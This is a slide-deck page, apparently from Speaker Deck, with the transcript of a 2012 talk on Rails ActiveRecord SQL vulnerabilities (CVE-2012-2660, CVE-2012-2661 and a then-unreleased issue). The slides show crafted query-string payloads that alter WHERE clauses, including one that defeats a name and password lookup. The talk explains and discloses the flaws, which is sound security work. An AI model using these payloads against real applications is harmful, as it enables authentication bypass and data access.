Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

711272a06d435ca5139b50874351cdbf?s=47 Justin Collins
April 23, 2015
Programming
0
47

"Recent Rails SQL Issues" - 2012

711272a06d435ca5139b50874351cdbf?s=128

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

See All by Justin Collins
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
36
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
380
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
84
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
120
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
270
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
240
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
140
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
8
960
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
120

Other Decks in Programming

See All in Programming
Ff2c33d63aa8e06c90f4638c6266b4fb?s=48 sheharyar
1
410
7a33106dde82ecc65a220eaf9d131222?s=48 patrickjahr
0
150
3f523bb4384468543d01a1d21029fc12?s=48 obregonia1
0
440
9e68acadfe81c2634fae5b8c891f6814?s=48 tamaudon
1
220
2e72046813bf3dc01173fe54919a6d1d?s=48 cc4966
3
260
D5744e72b6a5e6673f991cab987a31ab?s=48 siketyan
2
130
D76231a2114896dfcc7b79ac69558b79?s=48 yosuke_furukawa
PRO
35
9.8k
3931098ae486b6df619050c63e24f6cc?s=48 osyo
0
790
3bf6da1f63cd8b7a2f802f95c269ed80?s=48 fromatom
0
330
585b6bd646ae00cd1025309c912d922f?s=48 saten
5
760
9bf923e39671cde83584e3e926296c13?s=48 kishikawakatsumi
7
1.4k
023b04c98f39cc041293d780352432ff?s=48 koic
8
1.3k

Featured

See All Featured
9fa239b3154a0169d99ab7bf1422dd12?s=48 marcelosomers
224
15k
A9179349dd2bdc67f377719f56d85656?s=48 garrettdimon
292
110k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
443
29k
4262b9cfacfb6b2c77f23e1d0310cd3e?s=48 myddelton
110
11k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
17
2.1k
E190023b66e2b8aa73a842b106920c93?s=48 zenorocha
302
40k
170b760e0147792d0140e59ec78e9893?s=48 eitanlees
119
11k
0bce06bd06ee7a2c4f5500f25dcf7f18?s=48 paulrobertlloyd
72
3.9k
027d1ebf66cc039a0bd3b55eeadbe75d?s=48 sachag
270
17k
9952dfcd5d338f8a8e7175c8a8f65fb5?s=48 wjessup
342
16k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
147
20k
E9221b172e78e888355fa2fe4541b595?s=48 mclloyd
PRO
2
7.4k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1